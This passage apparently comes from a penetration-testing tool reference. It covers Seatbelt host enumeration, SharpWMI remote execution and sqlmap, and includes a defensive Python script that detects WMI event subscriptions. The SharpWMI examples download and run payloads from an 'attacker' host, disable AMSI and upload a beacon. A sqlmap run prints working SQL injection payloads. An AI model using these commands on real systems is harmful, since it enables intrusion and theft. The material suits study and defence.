        TokenGroups, WindowsCredentialFiles, WindowsVault
 
   "Seatbelt.exe -group=system" runs the following commands:
 
        AMSIProviders, AntiVirus, AppLocker, ARPTable, AuditPolicies,
        AuditPolicyRegistry, AutoRuns, CredGuard, DNSCache,
        DotNet, EnvironmentPath, EnvironmentVariables, Hotfixes,
        InterestingProcesses, InternetSettings, LAPS, LastShutdown,
        LocalGPOs, LocalGroups, LocalUsers, LogonSessions,
        LSASettings, NamedPipes, NetworkProfiles, NetworkShares,
        NTLMSettings, OSInfo, PoweredOnEvents, PowerShell,
        Printers, Processes, PSSessionSettings, RDPSessions,
        SCCM, Services, Sysmon, TcpConnections,
        TokenPrivileges, UAC, UdpConnections, UserRightAssignments,
        WindowsAutoLogon, WindowsDefender, WindowsEventForwarding, WindowsFirewall,
        WMIEventConsumer, WMIEventFilter, WMIFilterBinding, WSUS
 
 
   "Seatbelt.exe -group=slack" runs the following commands:
 
        SlackDownloads, SlackPresence, SlackWorkspaces
 
   "Seatbelt.exe -group=chrome" runs the following commands:
 
        ChromeBookmarks, ChromeHistory, ChromePresence
 
   "Seatbelt.exe -group=remote" runs the following commands:
 
        AMSIProviders, AntiVirus, DotNet, ExplorerRunCommands, Hotfixes,
        InterestingProcesses, LastShutdown, LogonSessions, LSASettings,
        MappedDrives, NetworkProfiles, NetworkShares, NTLMSettings,
        PowerShell, ProcessOwners, PuttyHostKeys, PuttySessions,
        RDPSavedConnections, RDPSessions, Sysmon, WindowsDefender,
        WindowsEventForwarding, WindowsFirewall
 
   "Seatbelt.exe -group=misc" runs the following commands:
 
        ChromeBookmarks, ChromeHistory, ExplicitLogonEvents, FileInfo, FirefoxHistory,
        InstalledProducts, InterestingFiles, LogonEvents, MicrosoftUpdates,
        OutlookDownloads, PowerShellEvents, ProcessCreationEvents, ProcessOwners,
        RecycleBin, reg, RPCMappedEndpoints, ScheduledTasks,
        SearchIndex, SecurityPackages, SysmonEvents

Examples

seatbelt -q AntiVirus

This lists the antivirus products registered on the host (the AntiVirus check queries them via WMI); -q suppresses the banner.

C:\Tools>seatbelt -q AntiVirus
====== AntiVirus ======
 
  Engine                         : Windows Defender
  ProductEXE                     : windowsdefender://
  ReportingEXE                   : %ProgramFiles%\Windows Defender\MsMpeng.exe

seatbelt -q InstalledProducts

This lists the software installed on the system, which the InstalledProducts check reads from the registry.

C:\Tools>seatbelt -q InstalledProducts
====== InstalledProducts ======
 
  DisplayName                    : BleachBit 4.4.2.2142
  DisplayVersion                 : 4.4.2.2142
  Publisher                      : BleachBit
  InstallDate                    : 1/13/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Google Chrome
  DisplayVersion                 : 99.0.4844.74
  Publisher                      : Google LLC
  InstallDate                    : 3/15/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Icecast v2.0.0
  DisplayVersion                 :
  Publisher                      :
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Edge
  DisplayVersion                 : 99.0.1150.39
  Publisher                      : Microsoft Corporation
  InstallDate                    : 3/14/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Edge Update
  DisplayVersion                 : 1.3.155.85
  Publisher                      :
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Npcap
  DisplayVersion                 : 1.10
  Publisher                      : Nmap Project
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Wireshark 3.4.4 64-bit
  DisplayVersion                 : 3.4.4
  Publisher                      : The Wireshark developer community, https://www.wireshark.org
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
  DisplayVersion                 : 12.0.30501.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
...
  DisplayName                    : Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
  DisplayVersion                 : 14.28.29910
  Publisher                      : Microsoft Corporation
  InstallDate                    : 4/8/2021 12:00:00 AM
  Architecture                   : x64
 
  DisplayName                    : Java(TM) SE Development Kit 15 (64-bit)
  DisplayVersion                 : 15.0.0.0
  Publisher                      : Oracle Corporation
  InstallDate                    : 9/26/2020 12:00:00 AM
  Architecture                   : x64

seatbelt.exe -q <command> -computername=x.x.x.x -username=<domain>\<user> -password=<password>

This runs the given command against a remote host with the supplied credentials, using WMI and the remote registry (both RPC-based). Only the commands listed in the "remote" group above are implemented to work this way; the others read local-only sources and return nothing useful when pointed at another machine.

Blog Posts

SharpWMI

Description

A C# implementation of various WMI functionality.

This implementation is a refurbished and enhanced fork (by @mgeeky) of the original SharpWMI by @harmj0y. It adds more flexibility for working with VBS scripts, AMSI bypass on the target (amsi=disable), file upload purely via WMI, and the ability to return the output of remotely executed commands (result=true). The usage text below is from that fork; the Author and URL fields refer to the original GhostPack project.

PlatformWindows
AuthorWill Schroeder
License3-Clause BSD
URLhttps://github.com/GhostPack/SharpWMI

Usage

USAGE:
  Local system enumeration:       
    SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
 
  Remote system enumeration:
    SharpWMI.exe action=query [computername=HOST1[,HOST2,...]] query="select * from win32_service" [namespace=BLAH]
 
  Remote system Logged On users enumeration:
    SharpWMI.exe action=loggedon [computername=HOST1[,HOST2,...]]
 
  Remote process creation:
    SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="C:\\temp\\process.exe [args]" [amsi=disable] [result=true]
 
  Remote VBS execution:
    SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
 
  File upload via WMI:
    SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source="C:\\source\\file.exe" dest="C:\\temp\\dest-file.exe" [amsi=disable]
 
  Remote firewall enumeration :
    SharpWMI.exe action=firewall computername=HOST1[,HOST2,...]
 
  List processes:
    SharpWMI.exe action=ps [computername=HOST[,HOST2,...]]
 
  Terminate process (first found):
    SharpWMI.exe action=terminate process=PID|name [computername=HOST[,HOST2,...]]
 
  Get environment variables (all if name not given):
    SharpWMI.exe action=getenv [name=VariableName] [computername=HOST[,HOST2,...]]
 
  Set environment variable:
    SharpWMI.exe action=setenv name=VariableName value=VariableValue [computername=HOST[,HOST2,...]]
 
  Delete an environment variable:
    SharpWMI.exe action=delenv name=VariableName [computername=HOST[,HOST2,...]]
 
  Install MSI file:
    SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path="C:\\temp\\installer.msi" [amsi=disable]
 
NOTE:
  - Any remote function also takes an optional "username=DOMAIN\\user" "password=Password123!".
  - If computername is not specified, will target localhost.
 
VBS Script execution:
  The 'executevbs' action was reworked as compared to the original version of SharpWMI.
  Script specification defined in [script-specification] offers following methods to point this tool at target VBS code:
 
  A) Executes OS command via preset VBS code:
    SharpWMI.exe action=executevbs [...] command="notepad.exe"
 
  B) Downloads Powershell commands from URL and execute them from within VBS via Powershell's StdIn:
    SharpWMI.exe action=executevbs [...] url="http://attacker/myscript.ps1"
 
  C) Download a binary file from given URL, store it in specified path and then execute it:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe"
 
  D) Download a binary file from given URL, store it in specified path and then execute arbitrary command:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe" command="%TEMP%\bar.exe -some -parameters"
 
  E) Read VBS script from file and execute it:
    SharpWMI.exe action=executevbs [...] script="myscript.vbs"
 
  F) Execute given VBS script given literally:
    SharpWMI.exe action=executevbs [...] script="CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\")"
 
  G) Base64 decode input string being encoded VBS script and execute it on remote machine:
    SharpWMI.exe action=executevbs [...] scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIi[...]"
 
  H) Read contents of given file, base64 decode them and then execute on target machine:
    SharpWMI.exe action=executevbs [...] scriptb64="myscript.vbs.b64"
 
  Finally, 'executevbs' action may have additional [time-specs] defined in seconds - they specify script trigger and wait timeouts:
    SharpWMI.exe action=executevbs [...] trigger=5 timeout=10
 
 
EXAMPLES:
 
  SharpWMI.exe action=query query="select * from win32_process"
 
  SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\\SecurityCenter2"
 
  SharpWMI.exe action=loggedon computername=primary.testlab.local
 
  SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
 
  SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process"
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="whoami" result=true amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local command="notepad.exe" eventname="MyLittleEvent" amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local username="TESTLAB\\harmj0y" password="Password123!"
 
  SharpWMI.exe action=upload computername=primary.testlab.local source="beacon.exe" dest="C:\\Windows\\temp\\foo.exe" amsi=disable
 
  SharpWMI.exe action=terminate computername=primary.testlab.local process=explorer
 
  SharpWMI.exe action=getenv name=PATH computername=primary.testlab.local
 
  SharpWMI.exe action=setenv name=FOO value="BAR" computername=primary.testlab.local
 
  SharpWMI.exe action=delenv name=FOO computername=primary.testlab.local
 
  SharpWMI.exe action=install computername=primary.testlab.local path="C:\\temp\\installer.msi"
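The executevbs action works by creating a WMI permanent event subscription on the target: an __EventFilter (named by eventname) bound through a __FilterToConsumerBinding to an ActiveScriptEventConsumer that runs the VBS. That is also what defenders hunt for, and it is why Seatbelt ships the WMIEventFilter, WMIEventConsumer and WMIFilterBinding commands. The following Python is an added example, not code from SharpWMI or from this page: it correlates the three object types and flags any binding whose consumer executes script or commands, reports dangling bindings, and allowlists the stock SCM Event Log pair. The records are constructed sample data; the filter query given for "MyLittleEvent" is an assumption, not the query the tool actually uses.

```python
"""Correlate WMI permanent event subscription objects and flag code-executing
consumers. Added example; input dicts mirror the root\\subscription classes
(as returned by Seatbelt's WMI* commands or Get-WmiObject). Sample data below
is constructed."""
import re
from dataclasses import dataclass

# A binding references its filter and consumer by object path, e.g.
#   ActiveScriptEventConsumer.Name="MyLittleEvent"
REF_RE = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>[^"]*)"$')

# Consumer classes that run attacker-supplied script or command lines.
CODE_EXEC_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}

# (filter name, consumer name) pairs present on a stock Windows install.
KNOWN_GOOD = {("SCM Event Log Filter", "SCM Event Log Consumer")}

# --- constructed sample data: stock SCM pair plus a SharpWMI-style subscription
FILTERS = [
    {"Name": "SCM Event Log Filter", "EventNamespace": "root\\cimv2",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"Name": "MyLittleEvent", "EventNamespace": "root\\cimv2",
     # Assumed timer-style query; SharpWMI's real query is not shown on the page.
     "Query": "SELECT * FROM __TimerEvent WHERE TimerID = 'MyLittleEvent'"},
]
CONSUMERS = [
    {"__CLASS": "NTEventLogEventConsumer", "Name": "SCM Event Log Consumer"},
    {"__CLASS": "ActiveScriptEventConsumer", "Name": "MyLittleEvent",
     "ScriptingEngine": "VBScript",
     "ScriptText": 'CreateObject("WScript.Shell").Run("notepad.exe")'},
]
BINDINGS = [
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
    {"Filter": '__EventFilter.Name="MyLittleEvent"',
     "Consumer": 'ActiveScriptEventConsumer.Name="MyLittleEvent"'},
]


@dataclass
class Finding:
    filter_name: str
    consumer_class: str
    consumer_name: str
    query: str
    payload: str
    reasons: list


def parse_ref(ref):
    """Split 'Class.Name="value"' into (class, value)."""
    m = REF_RE.match(ref)
    if not m:
        raise ValueError(f"unrecognised object path: {ref!r}")
    return m["cls"], m["name"]


def correlate(filters, consumers, bindings):
    """Walk every binding, join it to its filter and consumer, and explain
    why each non-allowlisted subscription deserves a look."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {(c["__CLASS"], c["Name"]): c for c in consumers}
    findings = []
    for b in bindings:
        _, fname = parse_ref(b["Filter"])
        ccls, cname = parse_ref(b["Consumer"])
        if (fname, cname) in KNOWN_GOOD:
            continue
        flt = by_filter.get(fname)
        con = by_consumer.get((ccls, cname))
        reasons = []
        if ccls in CODE_EXEC_CONSUMERS:
            reasons.append(f"{ccls} runs arbitrary code when the filter fires")
        if flt is None or con is None:
            reasons.append("dangling binding: filter or consumer object is missing")
        query = flt["Query"] if flt else ""
        if "__TimerEvent" in query or "__IntervalTimerInstruction" in query:
            reasons.append("timer-driven filter fires without any user action")
        if not reasons:
            reasons.append("subscription is not on the known-good allowlist")
        payload = ""
        if con:
            payload = con.get("ScriptText") or con.get("CommandLineTemplate") or ""
        findings.append(Finding(fname, ccls, cname, query, payload, reasons))
    return findings


if __name__ == "__main__":
    for f in correlate(FILTERS, CONSUMERS, BINDINGS):
        print(f"[!] {f.filter_name} -> {f.consumer_class}.{f.consumer_name}")
        print(f"    query   : {f.query}")
        print(f"    payload : {f.payload}")
        for r in f.reasons:
            print(f"    reason  : {r}")
```

Bindings are joined on the object-path strings rather than on names alone because two consumers of different classes may share a Name; a dangling binding (consumer deleted, binding left) is reported as well, since that is what a hurried clean-up often leaves behind.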

Examples

Blog Posts

sqlmap

Description

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

PlatformAll
AuthorSqlmap Project
LicenseGPLv3
URLhttps://sqlmap.org

Usage

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
Usage: python3 sqlmap [options]
 
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
 
  Target:
    At least one of these options has to be provided to define the
    target(s)
 
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -d DIRECT           Connection string for direct database connection
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
 
  Request:
    These options can be used to specify how to connect to the target URL
 
    -A AGENT, --user..  HTTP User-Agent header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --live-cookies=L..  Live cookies file used for loading up-to-date values
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --mobile            Imitate smartphone through HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, Bearer, ...)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --proxy-freq=PRO..  Requests between change of proxy from a given list
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --retry-on=RETRYON  Retry request on regexp matching content (e.g. "drop")
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Regular requests between visits to a safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --csrf-method=CS..  HTTP method to use during anti-CSRF token page visit
    --csrf-retries=C..  Retries for anti-CSRF token retrieval (default 0)
    --force-ssl         Force usage of SSL/HTTPS
    --chunked           Use HTTP chunked transfer encoded (POST) requests
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
 
  Optimization:
    These options can be used to optimize the performance of sqlmap
 
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
 
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
 
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --param-filter=P..  Select testable parameter(s) by place (e.g. "POST")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
 
  Detection:
    These options can be used to customize the detection phase
 
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --smart             Perform thorough tests only if positive heuristic(s)
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
 
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
 
    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
 
  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
 
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables
 
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    --statements        Retrieve SQL statements being run on DBMS
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=SQLQ..  SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
 
  Brute force:
    These options can be used to run brute force checks
 
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
    --common-files      Check existence of common files
 
  User-defined function injection:
    These options can be used to create custom user-defined functions
 
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
 
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
 
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
 
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
 
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
 
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
 
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
 
  General:
    These options can be used to set some general working parameters
 
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --base64=BASE64P..  Parameter(s) containing Base64 encoded data
    --base64-safe       Use URL and filename safe Base64 alphabet (RFC 4648)
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing (request)
    --postprocess=PO..  Use given script(s) for postprocessing (response)
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp for filtering targets
    --skip-heuristics   Skip heuristic detection of vulnerabilities
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --table-prefix=T..  Prefix used for temporary tables (default: "sqlmap")
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
 
  Miscellaneous:
    These options do not fit into any other category
 
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --beep              Beep on question and/or when vulnerability is found
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --list-tampers      Display list of available tamper scripts
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --results-file=R..  Location of CSV results file in multiple targets mode
    --shell             Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --unstable          Adjust options for unstable connections
    --update            Update sqlmap
    --wizard            Simple wizard interface for beginner users

Examples

sqlmap -u http://x.x.x.x/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc"

This reuses a previously obtained session cookie (--cookie) so that pages behind authentication are reachable, crawls links from the start URL to depth 2 (--crawl=2), and parses and tests every HTML form found on the crawled pages (--forms) for SQL injection. Without --batch sqlmap stops at each decision point and prompts, as in the output below; add --batch to accept the defaults unattended. In multiple-target mode the findings are also written to the CSV results file named in the output.

└─$ sqlmap -u http://10.129.95.174/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc"
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 21:56:42 /2022-03-27/
 
do you want to check for the existence of site's sitemap(.xml) [y/N]
[21:56:44] [INFO] starting crawler for target URL 'http://10.129.95.174/dashboard.php'
[21:56:44] [INFO] searching for links with depth 1
[21:56:45] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)] 2
[21:56:47] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n]
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[21:56:51] [INFO] found a total of 2 targets
[1/2] Form:
GET http://10.129.95.174/dashboard.php?search=
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: search=]:
do you want to fill blank fields with random values? [Y/n]
[21:57:03] [INFO] using '/home/kali/.local/share/sqlmap/output/results-03272022_0957pm.csv' as the CSV results file in multiple targets mode
[21:57:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:57:04] [INFO] testing if the target URL content is stable
[21:57:04] [INFO] target URL content is stable
[21:57:04] [INFO] testing if GET parameter 'search' is dynamic
[21:57:04] [WARNING] GET parameter 'search' does not appear to be dynamic
[21:57:04] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[21:57:04] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[21:57:04] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:57:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:57:34] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:57:34] [INFO] testing 'Generic inline queries'
[21:57:34] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[21:57:34] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[21:57:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:57:34] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[21:57:34] [INFO] testing 'PostgreSQL inline queries'
[21:57:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:57:34] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[21:57:44] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[21:57:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:57:54] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[21:57:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn
 
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
